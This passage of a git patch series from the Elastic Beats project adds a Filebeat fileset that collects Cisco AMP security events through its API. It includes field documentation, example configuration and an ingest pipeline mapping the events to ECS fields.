emptyTransformContext(), + resp: transformable{ + "body": common.MapStr{ + "@timestamp": "1234567890", + "items": "Line 1\nLine 2\nLine 3", + }, + }, + expectedMessages: []common.MapStr{ + {"@timestamp": "1234567890", "items": "Line 1"}, + {"@timestamp": "1234567890", "items": "Line 2"}, + {"@timestamp": "1234567890", "items": "Line 3"}, + }, + }, } for _, tc := range cases { From 183fae5bb8ffbadcdde6bba0cfc28f666955896c Mon Sep 17 00:00:00 2001 From: Marius Iversen Date: Mon, 15 Feb 2021 12:05:42 +0100 Subject: [PATCH 37/63] [Filebeat][New Fileset] Cisco AMP (#22768) * initial stash for cisco amp * stashing more cisco amp changes * stashing httpjson v2 type config and merging with master * stashing amp changes * updating fields.go * first finalized MVP for Cisco AMP * added changelog * This commit resolves most of the comments made to the PR * updating pipeline based on PR feedback and comments * updating field mapping and docs based on PR comments --- CHANGELOG.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 537 ++ filebeat/docs/modules/cisco.asciidoc | 81 + x-pack/filebeat/filebeat.reference.yml | 17 + x-pack/filebeat/module/cisco/_meta/config.yml | 17 + .../filebeat/module/cisco/_meta/docs.asciidoc | 81 + .../module/cisco/amp/_meta/fields.yml | 271 + .../module/cisco/amp/config/config.yml | 77 + .../module/cisco/amp/ingest/pipeline.yml | 434 ++ x-pack/filebeat/module/cisco/amp/manifest.yml | 24 + .../cisco/amp/test/cisco_amp.ndjson.log | 8 + .../test/cisco_amp.ndjson.log-expected.json | 87 + .../cisco/amp/test/cisco_amp2.ndjson.log | 962 +++ .../test/cisco_amp2.ndjson.log-expected.json | 6482 +++++++++++++++++ x-pack/filebeat/module/cisco/fields.go | 2 +- x-pack/filebeat/modules.d/cisco.yml.disabled | 17 + 16 files changed, 9097 insertions(+), 1 deletion(-) create mode 100644 x-pack/filebeat/module/cisco/amp/_meta/fields.yml create mode 100644 x-pack/filebeat/module/cisco/amp/config/config.yml create mode 100644 x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/cisco/amp/manifest.yml create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log create mode 100644 x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 9305d523f7f6..da96341ff564 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -819,6 +819,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added `alternative_host` option to google pubsub input {pull}23215[23215] - Added username parsing from Cisco ASA message 302013. {pull}21196[21196] - Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] +- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] - Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] - Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] - Move aws-s3 input to GA. {pull}23631[23631] diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 42e2d318a998..76f3dc5a38af 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -20809,6 +20809,543 @@ Module for handling Cisco network device logs. +[float] +=== cisco.amp + +Module for parsing Cisco AMP logs. + + + +*`cisco.amp.timestamp_nanoseconds`*:: ++ +-- +The timestamp in Epoch nanoseconds. + + +type: date + +-- + +*`cisco.amp.event_type_id`*:: ++ +-- +A sub ID of the event, depending on event type. + + +type: keyword + +-- + +*`cisco.amp.detection`*:: ++ +-- +The name of the malware detected. + + +type: keyword + +-- + +*`cisco.amp.detection_id`*:: ++ +-- +The ID of the detection. + + +type: keyword + +-- + +*`cisco.amp.connector_guid`*:: ++ +-- +The GUID of the connector sending information to AMP. + + +type: keyword + +-- + +*`cisco.amp.group_guids`*:: ++ +-- +An array of group GUIDS related to the connector sending information to AMP. + + +type: keyword + +-- + +*`cisco.amp.vulnerabilities`*:: ++ +-- +An array of related vulnerabilities to the malicious event. + + +type: flattened + +-- + +*`cisco.amp.scan.description`*:: ++ +-- +Description of an event related to a scan being initiated, for example the specific directory name. + + +type: keyword + +-- + +*`cisco.amp.scan.clean`*:: ++ +-- +Boolean value if a scanned file was clean or not. + + +type: boolean + +-- + +*`cisco.amp.scan.scanned_files`*:: ++ +-- +Count of files scanned in a directory. + + +type: long + +-- + +*`cisco.amp.scan.scanned_processes`*:: ++ +-- +Count of processes scanned related to a single scan event. + + +type: long + +-- + +*`cisco.amp.scan.scanned_paths`*:: ++ +-- +Count of different directories scanned related to a single scan event. + + +type: long + +-- + +*`cisco.amp.scan.malicious_detections`*:: ++ +-- +Count of malicious files or documents detected related to a single scan event. + + +type: long + +-- + +*`cisco.amp.computer.connector_guid`*:: ++ +-- +The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. + + +type: keyword + +-- + +*`cisco.amp.computer.external_ip`*:: ++ +-- +The external IP of the related host. + + +type: ip + +-- + +*`cisco.amp.computer.active`*:: ++ +-- +If the current endpoint is active or not. + + +type: boolean + +-- + +*`cisco.amp.computer.network_addresses`*:: ++ +-- +All network interface information on the related host. + + +type: flattened + +-- + +*`cisco.amp.file.disposition`*:: ++ +-- +Categorization of file, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.network_info.disposition`*:: ++ +-- +Categorization of a network event related to a file, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.network_info.nfm.direction`*:: ++ +-- +The current direction based on source and destination IP. + + +type: keyword + +-- + +*`cisco.amp.related.mac`*:: ++ +-- +An array of all related MAC addresses. + + +type: keyword + +-- + +*`cisco.amp.related.cve`*:: ++ +-- +An array of all related MAC addresses. + + +type: keyword + +-- + +*`cisco.amp.cloud_ioc.description`*:: ++ +-- +Description of the related IOC for specific IOC events from AMP. + + +type: keyword + +-- + +*`cisco.amp.cloud_ioc.short_description`*:: ++ +-- +Short description of the related IOC for specific IOC events from AMP. + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.disposition`*:: ++ +-- +Categorization of a IOC for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.identity.md5`*:: ++ +-- +MD5 hash of the related IOC. + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.identity.sha1`*:: ++ +-- +SHA1 hash of the related IOC. + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.identify.sha256`*:: ++ +-- +SHA256 hash of the related IOC. + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.disposition`*:: ++ +-- +Categorization of a file archive related to a file, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.identity.md5`*:: ++ +-- +MD5 hash of the archived file related to the malicious event. + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.identity.sha1`*:: ++ +-- +SHA1 hash of the archived file related to the malicious event. + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.identify.sha256`*:: ++ +-- +SHA256 hash of the archived file related to the malicious event. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.application`*:: ++ +-- +The application name related to Exploit Prevention events. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.attacked_module`*:: ++ +-- +Path to the executable or dll that was attacked and detected by Exploit Prevention. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.base_address`*:: ++ +-- +The base memory address related to the exploit detected. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.suspicious_files`*:: ++ +-- +An array of related files when an attack is detected by Exploit Prevention. + + +type: keyword + +-- + +*`cisco.amp.file.parent.disposition`*:: ++ +-- +Categorization of parrent, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.error.description`*:: ++ +-- +Description of an endpoint error event. + + +type: keyword + +-- + +*`cisco.amp.error.error_code`*:: ++ +-- +The error code describing the related error event. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.severity`*:: ++ +-- +Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_report_guid`*:: ++ +-- +The GUID of the related threat hunting report. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_hunt_guid`*:: ++ +-- +The GUID of the related investigation tracking issue. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_title`*:: ++ +-- +Title of the incident related to the threat hunting activity. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_summary`*:: ++ +-- +Summary of the outcome on the threat hunting activity. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_remediation`*:: ++ +-- +Recommendations to resolve the vulnerability or exploited host. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_id`*:: ++ +-- +The id of the related incident for the threat hunting activity. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_end_time`*:: ++ +-- +When the threat hunt finalized or closed. + + +type: date + +-- + +*`cisco.amp.threat_hunting.incident_start_time`*:: ++ +-- +When the threat hunt was initiated. + + +type: date + +-- + +*`cisco.amp.file.attack_details.indicators`*:: ++ +-- +Different indicator types that matches the exploit detected, for example different MITRE tactics. + + +type: flattened + +-- + +*`cisco.amp.threat_hunting.tactics`*:: ++ +-- +List of all MITRE tactics related to the incident found. + + +type: flattened + +-- + +*`cisco.amp.threat_hunting.techniques`*:: ++ +-- +List of all MITRE techniques related to the incident found. + + +type: flattened + +-- + +*`cisco.amp.tactics`*:: ++ +-- +List of all MITRE tactics related to the incident found. + + +type: flattened + +-- + +*`cisco.amp.techniques`*:: ++ +-- +List of all MITRE techniques related to the incident found. + + +type: flattened + +-- + [float] === cisco.asa diff --git a/filebeat/docs/modules/cisco.asciidoc b/filebeat/docs/modules/cisco.asciidoc index 8f55d5c16d86..b3d6c901addd 100644 --- a/filebeat/docs/modules/cisco.asciidoc +++ b/filebeat/docs/modules/cisco.asciidoc @@ -14,6 +14,7 @@ This is a module for Cisco network device's logs and Cisco Umbrella. It includes filesets for receiving logs over syslog or read from a file: - `asa` fileset: supports Cisco ASA firewall logs. +- `amp` fileset: supports Cisco AMP API logs. - `ftd` fileset: supports Cisco Firepower Threat Defense logs. - `ios` fileset: supports Cisco IOS router and switch logs. - `nexus` fileset: supports Cisco Nexus switch logs. @@ -444,6 +445,86 @@ Maximum duration before AWS API request will be interrupted. Default to be 120 s :fileset_ex!: +[float] +==== `amp` fileset settings + +The Cisco AMP fileset focuses on collecting events from your Cisco AMP/Cisco Secure Endpoint API. + +To configure the Cisco AMP fileset you will need to retrieve your `client_id` and `api_key` from the AMP dashboard. +For more information on how to retrieve these credentials, please reference the https://api-docs.amp.cisco.com/api_resources?api_host=api.amp.cisco.com&api_version=v1[Cisco AMP API documentation]. + +The URL configured for the API depends on which region your AMP is located, currently there are three choices: +- api.amp.cisco.com +- api.apjc.amp.cisco.com +- api.eu.amp.cisco.com + +If new endpoints are added by Cisco in the future, please reference the API URL list located at the https://api-docs.amp.cisco.com/[Cisco AMP API Docs]. + +Example config: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 +---- + +When starting up the Filebeat module for the first time, you are able to configure how far back you want Filebeat to collect existing events from. +It is also possible to select how often Filebeat will check the Cisco AMP API. Another example below which looks back 200 hours and have a custom timeout: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 + var.first_interval: 200h + var.interval: 60m + var.request_timeout: 120s + var.limit: 100 + +---- + +*`var.input`*:: + +The input from which messages are read. Supports httpjson. + +*`var.url`*:: + +The URL to the Cisco AMP API endpoint, this url value depends on your region. It will be the same region as your Cisco AMP Dashboard URL. + +*`var.client_id`*:: + +The ID for the user account used to access the API. + +*`var.api_key`*:: + +The API secret used together with the related client_id. + +*`var.request_timeout`*:: + +When handling large influxes of events, especially for large enterprises, the API might take longer to respond. This value is to set a custom +timeout value for each request sent by Filebeat. + +*`var.first_interval`*:: + +How far back you would want to collect events the first time the Filebeat module starts up. Supports amount in hours(example: 24h), minutes(example: 10m) and seconds(example: 50s). + +*`var.limit`*:: + +This value controls how many events are returned by the Cisco AMP API per page. + +:has-dashboards!: + +:fileset_ex!: + [float] === Example dashboard diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index 01f65a4c9101..16c974895a34 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml @@ -616,6 +616,23 @@ filebeat.modules: # Maximum duration before AWS API request will be interrupted #var.api_timeout: 120s + amp: + enabled: true + + # Set which input to use between httpjson (default) or file. + #var.input: httpjson + + # The API URL + #var.url: https://api.amp.cisco.com/v1/events + # The client ID used as a username for the API requests. + #var.client_id: + # The API key related to the client ID. + #var.api_key: + # How far to look back the first time the module is started. Expects an amount of hours. + #var.first_interval: 24h + # Overriding the default request timeout, optional. + #var.request_timeout: 60s + #------------------------------- Coredns Module ------------------------------- - module: coredns # Fileset for native deployment diff --git a/x-pack/filebeat/module/cisco/_meta/config.yml b/x-pack/filebeat/module/cisco/_meta/config.yml index 77b3658c42b1..3af897a1225a 100644 --- a/x-pack/filebeat/module/cisco/_meta/config.yml +++ b/x-pack/filebeat/module/cisco/_meta/config.yml @@ -120,3 +120,20 @@ #var.visibility_timeout: 300s # Maximum duration before AWS API request will be interrupted #var.api_timeout: 120s + + amp: + enabled: true + + # Set which input to use between httpjson (default) or file. + #var.input: httpjson + + # The API URL + #var.url: https://api.amp.cisco.com/v1/events + # The client ID used as a username for the API requests. + #var.client_id: + # The API key related to the client ID. + #var.api_key: + # How far to look back the first time the module is started. Expects an amount of hours. + #var.first_interval: 24h + # Overriding the default request timeout, optional. + #var.request_timeout: 60s diff --git a/x-pack/filebeat/module/cisco/_meta/docs.asciidoc b/x-pack/filebeat/module/cisco/_meta/docs.asciidoc index c6bdd1854f83..f7f4f44180f7 100644 --- a/x-pack/filebeat/module/cisco/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/cisco/_meta/docs.asciidoc @@ -9,6 +9,7 @@ This is a module for Cisco network device's logs and Cisco Umbrella. It includes filesets for receiving logs over syslog or read from a file: - `asa` fileset: supports Cisco ASA firewall logs. +- `amp` fileset: supports Cisco AMP API logs. - `ftd` fileset: supports Cisco Firepower Threat Defense logs. - `ios` fileset: supports Cisco IOS router and switch logs. - `nexus` fileset: supports Cisco Nexus switch logs. @@ -439,6 +440,86 @@ Maximum duration before AWS API request will be interrupted. Default to be 120 s :fileset_ex!: +[float] +==== `amp` fileset settings + +The Cisco AMP fileset focuses on collecting events from your Cisco AMP/Cisco Secure Endpoint API. + +To configure the Cisco AMP fileset you will need to retrieve your `client_id` and `api_key` from the AMP dashboard. +For more information on how to retrieve these credentials, please reference the https://api-docs.amp.cisco.com/api_resources?api_host=api.amp.cisco.com&api_version=v1[Cisco AMP API documentation]. + +The URL configured for the API depends on which region your AMP is located, currently there are three choices: +- api.amp.cisco.com +- api.apjc.amp.cisco.com +- api.eu.amp.cisco.com + +If new endpoints are added by Cisco in the future, please reference the API URL list located at the https://api-docs.amp.cisco.com/[Cisco AMP API Docs]. + +Example config: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 +---- + +When starting up the Filebeat module for the first time, you are able to configure how far back you want Filebeat to collect existing events from. +It is also possible to select how often Filebeat will check the Cisco AMP API. Another example below which looks back 200 hours and have a custom timeout: + +[source,yaml] +---- +- module: cisco + amp: + enabled: true + var.input: httpjson + var.url: https://api.amp.cisco.com/v1/events + var.client_id: 123456 + var.api_key: sfda987gdf90s0df0 + var.first_interval: 200h + var.interval: 60m + var.request_timeout: 120s + var.limit: 100 + +---- + +*`var.input`*:: + +The input from which messages are read. Supports httpjson. + +*`var.url`*:: + +The URL to the Cisco AMP API endpoint, this url value depends on your region. It will be the same region as your Cisco AMP Dashboard URL. + +*`var.client_id`*:: + +The ID for the user account used to access the API. + +*`var.api_key`*:: + +The API secret used together with the related client_id. + +*`var.request_timeout`*:: + +When handling large influxes of events, especially for large enterprises, the API might take longer to respond. This value is to set a custom +timeout value for each request sent by Filebeat. + +*`var.first_interval`*:: + +How far back you would want to collect events the first time the Filebeat module starts up. Supports amount in hours(example: 24h), minutes(example: 10m) and seconds(example: 50s). + +*`var.limit`*:: + +This value controls how many events are returned by the Cisco AMP API per page. + +:has-dashboards!: + +:fileset_ex!: + [float] === Example dashboard diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml new file mode 100644 index 000000000000..de20fe61484f --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml @@ -0,0 +1,271 @@ +- name: cisco.amp + type: group + release: beta + default_field: false + description: > + Module for parsing Cisco AMP logs. + fields: + - name: timestamp_nanoseconds + type: date + description: > + The timestamp in Epoch nanoseconds. + + - name: event_type_id + type: keyword + description: > + A sub ID of the event, depending on event type. + + - name: detection + type: keyword + description: > + The name of the malware detected. + + - name: detection_id + type: keyword + description: > + The ID of the detection. + + - name: connector_guid + type: keyword + description: > + The GUID of the connector sending information to AMP. + + - name: group_guids + type: keyword + description: > + An array of group GUIDS related to the connector sending information to AMP. + + - name: vulnerabilities + type: flattened + description: > + An array of related vulnerabilities to the malicious event. + + - name: scan.description + type: keyword + description: > + Description of an event related to a scan being initiated, for example the specific directory name. + + - name: scan.clean + type: boolean + description: > + Boolean value if a scanned file was clean or not. + + - name: scan.scanned_files + type: long + description: > + Count of files scanned in a directory. + + - name: scan.scanned_processes + type: long + description: > + Count of processes scanned related to a single scan event. + + - name: scan.scanned_paths + type: long + description: > + Count of different directories scanned related to a single scan event. + + - name: scan.malicious_detections + type: long + description: > + Count of malicious files or documents detected related to a single scan event. + + - name: computer.connector_guid + type: keyword + description: > + The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. + + - name: computer.external_ip + type: ip + description: > + The external IP of the related host. + + - name: computer.active + type: boolean + description: > + If the current endpoint is active or not. + + - name: computer.network_addresses + type: flattened + description: > + All network interface information on the related host. + + - name: file.disposition + type: keyword + description: > + Categorization of file, for example "Malicious" or "Clean". + + - name: network_info.disposition + type: keyword + description: > + Categorization of a network event related to a file, for example "Malicious" or "Clean". + + - name: network_info.nfm.direction + type: keyword + description: > + The current direction based on source and destination IP. + + - name: related.mac + type: keyword + description: > + An array of all related MAC addresses. + + - name: related.cve + type: keyword + description: > + An array of all related MAC addresses. + + - name: cloud_ioc.description + type: keyword + description: > + Description of the related IOC for specific IOC events from AMP. + + - name: cloud_ioc.short_description + type: keyword + description: > + Short description of the related IOC for specific IOC events from AMP. + + - name: network_info.parent.disposition + type: keyword + description: > + Categorization of a IOC for example "Malicious" or "Clean". + + - name: network_info.parent.identity.md5 + type: keyword + description: > + MD5 hash of the related IOC. + + - name: network_info.parent.identity.sha1 + type: keyword + description: > + SHA1 hash of the related IOC. + + - name: network_info.parent.identify.sha256 + type: keyword + description: > + SHA256 hash of the related IOC. + + - name: file.archived_file.disposition + type: keyword + description: > + Categorization of a file archive related to a file, for example "Malicious" or "Clean". + + - name: file.archived_file.identity.md5 + type: keyword + description: > + MD5 hash of the archived file related to the malicious event. + + - name: file.archived_file.identity.sha1 + type: keyword + description: > + SHA1 hash of the archived file related to the malicious event. + + - name: file.archived_file.identify.sha256 + type: keyword + description: > + SHA256 hash of the archived file related to the malicious event. + + - name: file.attack_details.application + type: keyword + description: > + The application name related to Exploit Prevention events. + + - name: file.attack_details.attacked_module + type: keyword + description: > + Path to the executable or dll that was attacked and detected by Exploit Prevention. + + - name: file.attack_details.base_address + type: keyword + description: > + The base memory address related to the exploit detected. + + - name: file.attack_details.suspicious_files + type: keyword + description: > + An array of related files when an attack is detected by Exploit Prevention. + + - name: file.parent.disposition + type: keyword + description: > + Categorization of parrent, for example "Malicious" or "Clean". + + - name: error.description + type: keyword + description: > + Description of an endpoint error event. + + - name: error.error_code + type: keyword + description: > + The error code describing the related error event. + + - name: threat_hunting.severity + type: keyword + description: > + Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. + + - name: threat_hunting.incident_report_guid + type: keyword + description: > + The GUID of the related threat hunting report. + + - name: threat_hunting.incident_hunt_guid + type: keyword + description: > + The GUID of the related investigation tracking issue. + + - name: threat_hunting.incident_title + type: keyword + description: > + Title of the incident related to the threat hunting activity. + + - name: threat_hunting.incident_summary + type: keyword + description: > + Summary of the outcome on the threat hunting activity. + + - name: threat_hunting.incident_remediation + type: keyword + description: > + Recommendations to resolve the vulnerability or exploited host. + + - name: threat_hunting.incident_id + type: keyword + description: > + The id of the related incident for the threat hunting activity. + + - name: threat_hunting.incident_end_time + type: date + description: > + When the threat hunt finalized or closed. + + - name: threat_hunting.incident_start_time + type: date + description: > + When the threat hunt was initiated. + + - name: file.attack_details.indicators + type: flattened + description: > + Different indicator types that matches the exploit detected, for example different MITRE tactics. + + - name: threat_hunting.tactics + type: flattened + description: > + List of all MITRE tactics related to the incident found. + + - name: threat_hunting.techniques + type: flattened + description: > + List of all MITRE techniques related to the incident found. + + - name: tactics + type: flattened + description: > + List of all MITRE tactics related to the incident found. + + - name: techniques + type: flattened + description: > + List of all MITRE techniques related to the incident found. \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml new file mode 100644 index 000000000000..8e4695d7458b --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -0,0 +1,77 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +{{ if .client_id }} +auth.basic.user: {{ .client_id }} +{{ end }} +{{ if .api_key }} +auth.basic.password: {{ .api_key }} +{{ end }} + +request.url: {{ .url }} +request.method: GET +request.timeout: {{ .request_timeout }} +{{ if .ssl }} +request.ssl: {{ .ssl | tojson }} +{{ end }} +request.transforms: +- set: + target: url.params.start_date + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "2006-01-02T15:04:05-07:00" ]]' +- set: + target: url.params.limit + value: {{ .limit }} +request.rate_limit.limit: '[[ .last_response.header.Get "X-RateLimit-Limit" ]]' +request.rate_limit.reset: '[[ .last_response.header.Get "X-RateLimit-Reset" ]]' +request.rate_limit.remaining: '[[ .last_response.header.Get "X-RateLimit-Remaining" ]]' + +response.split: + target: body.data + keep_parent: true + +response.pagination: +- set: + target: url.value + value: '[[ .last_response.body.metadata.links.next ]]' + +cursor: + timestamp: + value: '[[ .first_event.data.date ]]' + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + target: json + - if: + has_fields: ["json.data.id"] + then: + - fingerprint: + fields: ["json.data.id"] + target_field: "@metadata._id" + else: + - fingerprint: + fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"] + target_field: "@metadata._id" + - add_fields: + target: '' + fields: + ecs.version: 1.7.0 diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml new file mode 100644 index 000000000000..b77c3be1f9cd --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml @@ -0,0 +1,434 @@ +description: Pipeline for parsing Cisco AMP logs +processors: + +- remove: + field: + - message + ignore_missing: true +######################### +## ECS General Mapping ## +######################### +- rename: + field: json.data + target_field: cisco.amp + ignore_missing: true +- remove: + field: + - "@timestamp" + ignore_missing: true + if: ctx?.cisco?.amp?.timestamp != null +- date: + field: cisco.amp.timestamp + formats: + - UNIX + ignore_failure: true + +####################### +## ECS Event Mapping ## +####################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: alert +- rename: + field: cisco.amp.id + target_field: event.id + ignore_missing: true +- append: + field: event.category + value: file + if: ctx?.cisco?.amp?.file?.file_name != null +- append: + field: event.category + value: malware + if: 'ctx?.cisco?.amp?.file?.disposition == "Malicious"' +- rename: + field: cisco.amp.event_type + target_field: event.action + ignore_missing: true +- set: + field: event.severity + value: 1 + if: ctx?.cisco?.amp?.severity == 'Low' +- set: + field: event.severity + value: 2 + if: ctx?.cisco?.amp?.severity == 'Medium' +- set: + field: event.severity + value: 3 + if: ctx?.cisco?.amp?.severity == 'High' +- set: + field: event.severity + value: 4 + if: ctx?.cisco?.amp?.severity == 'Critical' +- set: + field: event.severity + value: 0 + if: ctx?.cisco?.amp?.severity == null +- date: + field: cisco.amp.start_timestamp + target_field: event.start + formats: + - UNIX + ignore_failure: true + if: ctx?.cisco?.amp?.start_timestamp != null + +###################### +## ECS Host Mapping ## +###################### +- rename: + field: cisco.amp.computer.hostname + target_field: host.name + ignore_missing: true +- set: + field: host.hostname + value: "{{ host.name }}" + if: ctx?.host?.name != null +- rename: + field: cisco.amp.computer.user + target_field: host.user.name + ignore_missing: true + +######################### +## ECS Network Mapping ## +######################### +- rename: + field: cisco.amp.network_info.nfm.protocol + target_field: network.transport + ignore_missing: true +- set: + field: network.direction + value: egress + if: "ctx?.cisco?.amp?.network_info?.nfm?.direction == 'Outgoing connection from'" +- set: + field: network.direction + value: ingress + if: "ctx?.cisco?.amp?.network_info?.nfm?.direction != null && ctx?.cisco?.amp?.network_info?.nfm?.direction != 'Outgoing connection from'" + +##################### +## ECS URL Mapping ## +##################### +- uri_parts: + field: cisco.amp.network_info.dirty_url + target_field: url + keep_original: true + remove_if_successful: true + if: ctx?.cisco?.amp?.network_info?.dirty_url != null +- rename: + field: cisco.amp.network_info.dirty_url + target_field: url.original + ignore_missing: true + +######################## +## ECS Source Mapping ## +######################## +- rename: + field: cisco.amp.network_info.local_ip + target_field: source.ip + ignore_missing: true +- rename: + field: cisco.amp.network_info.local_port + target_field: source.port + ignore_missing: true + +############################# +## ECS Destination Mapping ## +############################# +- rename: + field: cisco.amp.network_info.remote_ip + target_field: destination.ip + ignore_missing: true +- rename: + field: cisco.amp.network_info.remote_port + target_field: destination.port + ignore_missing: true + +###################### +## ECS File Mapping ## +###################### +- rename: + field: cisco.amp.file.file_name + target_field: file.name + ignore_missing: true +- rename: + field: cisco.amp.file.file_path + target_field: file.path + ignore_missing: true +- rename: + field: cisco.amp.file.identity.sha256 + target_field: file.hash.sha256 + ignore_missing: true +- rename: + field: cisco.amp.file.identity.sha1 + target_field: file.hash.sha1 + ignore_missing: true +- rename: + field: cisco.amp.file.identity.md5 + target_field: file.hash.md5 + ignore_missing: true + +##################### +## ECS OS Mapping ## +##################### +- set: + field: host.os.family + value: windows + if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")' +- set: + field: host.os.platform + value: windows + if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")' + +######################### +## ECS Process Mapping ## +######################### +- rename: + field: cisco.amp.file.parent.process_id + target_field: process.pid + ignore_missing: true +- rename: + field: cisco.amp.file.parent.file_name + target_field: process.name + ignore_missing: true +- rename: + field: cisco.amp.file.parent.identity.sha256 + target_field: process.hash.sha256 + ignore_missing: true +- rename: + field: cisco.amp.file.parent.identity.sha1 + target_field: process.hash.sha1 + ignore_missing: true +- rename: + field: cisco.amp.file.parent.identity.md5 + target_field: process.hash.md5 + ignore_missing: true + +- rename: + field: cisco.amp.network_info.parent.process_id + target_field: process.pid + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.file_name + target_field: process.name + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.identity.sha256 + target_field: process.hash.sha256 + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.identity.sha1 + target_field: process.hash.sha1 + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.identity.md5 + target_field: process.hash.md5 + ignore_missing: true + +######################### +## ECS Related Mapping ## +######################### +- append: + field: related.user + value: "{{ host.user.name }}" + if: ctx?.host?.user?.name != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ process.hash.sha256 }}" + if: ctx?.process?.parent?.hash?.sha256 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ process.hash.md5 }}" + if: ctx?.process?.parent?.hash?.md5 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ process.hash.sha1 }}" + if: ctx?.process?.parent?.hash?.sha1 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ file.hash.sha256 }}" + if: ctx?.file?.hash?.sha256 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ file.hash.md5 }}" + if: ctx?.file?.hash?.md5 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ file.hash.sha1 }}" + if: ctx?.file?.hash?.sha1 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ cisco.amp.network_info.parent.identity.sha256 }}" + if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha256 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ cisco.amp.network_info.parent.identity.md5 }}" + if: ctx?.cisco?.amp?.network_info?.parent?.identity?.md5 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ cisco.amp.network_info.parent.identity.sha1 }}" + if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha1 != null + 